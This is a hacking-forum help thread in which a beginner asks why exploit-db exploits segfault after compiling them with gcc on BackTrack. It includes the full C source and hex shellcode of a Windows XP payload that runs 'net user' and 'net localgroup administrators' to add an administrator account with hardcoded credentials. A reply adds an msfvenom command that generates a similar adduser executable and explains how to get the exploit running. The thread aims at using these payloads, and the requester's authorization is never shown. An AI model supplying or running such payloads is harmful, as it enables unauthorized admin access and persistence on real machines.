Gcc segmentation fault error help

[Cyber.spirit]

hi guys firstly i wanna tell you that i have no background with C Programming and i used exploit-db search tool in BT5R2 to find a exploit 4 winxp (as u know this tool has too much exploits!) then i found it up to here everything was awsome i compiled the exploit with gcc and when i wanted to run the a.out file i got segmentation fault error dose anybody can help me thanx

[ZeroOne]

Can you type the command you entered when compiling, also what was the exact error output you got? paste please 

[Cyber.spirit]

ok man
Root@bt: gcc 1258.c
Root@bt:
Root@bt: ./a.out
Segmentation fault
Root@bt:

[ZeroOne]

Try compiling it this way:

-gcc -o 1258 1258.c

let me know what you get

[Cyber.spirit]

Try compiling it this way:

-gcc -o 1258 1258.c

let me know what you get

-gcc? Its gives me error brother an do i need to type the name twice?

[ZeroOne]

ops sorry,  gcc -o 1258 1258.c

[unicityd]

You don't need a "-" in front of gcc.  The -o option tell gcc where to write the output.  so "gcc -o output input.c" says to compile input.c and call the result "output". 

Since the program is segfaulting, you probably need to look at the code.  This is one reason why knowing C is useful for pen testing/security.

[ZeroOne]

Try compiling it this way:

-gcc -o 1258 1258.c

let me know what you get

-gcc? Its gives me error brother an do i need to type the name twice?

You are converting the 1258.c code (C language) to a low-level language so the computer can understand it, thats why we are using gcc -o 1258 1258.c .. I'll get online in an hour w'll go through the code

[Cyber.spirit]

thanx it works but for some exploits i get the same error idk why

[Cyber.spirit]

i think those exploits has anyway my exploit is working now thanx

[ZeroOne]

This is one reason why knowing C is useful for pen testing/security.

In my opinion, any penetration tester must have a solid background not only in C, but also Assembly, that way he can debug codes and create his own exploits. also build up his own tools. for me there is no discussion about that.

[Cyber.spirit]

yeah i agree with u and im learning assembly even i hate programming!

[Cyber.spirit]

hi guys im soo sorry if i backed to this topic. but i got the same error with another exploit which i really need it. so the file's name is : 15202.c and i typed this command as zero One said:

root@bt:/# gcc -o 15202 15202.c
root@bt:/#
root@bt:/#./15202
Segmentation fault

 as you see i got the damn same error so here is the source code of the exploit:

Code:

/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";

int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}

so please help me i have no idea and i extremely need this exploit thanx alot

[shadowzero]

Seems broken. This one works better: http://www.exploit-db.com/exploits/15203/

Couple of points:

This is meant to be run on Windows, so compiling it with gcc and trying to run it on Linux will fail. So you have two options: compile it on Windows, or figure out how to compile it on Linux (hint: read up on mingw)

Lots of exploits are designed to be broken to prevent script kiddies from using it... or worse, the shellcode could be be designed to wipe out your system or open a backdoor. Learn to create your own shellcode (hint: read up on msfvenom and msfpayload).

For instance, that exploit you found could have been easily generated with msfvenom:

Code:

msfvenom --payload windows/adduser --format exe > adduser.exe

Also, in order for the exploit to work, the user running it needs to be part of the Administrators group (or SYSTEM). Otherwise you'll just get an access denied error. So it makes more sense to use it as shellcode for an exploit.

Finally, you seem relatively new to this, so unless the machine you're targeting is your own, I suggest treading carefully. Doing things blindly can cause more harm than good.

Good luck.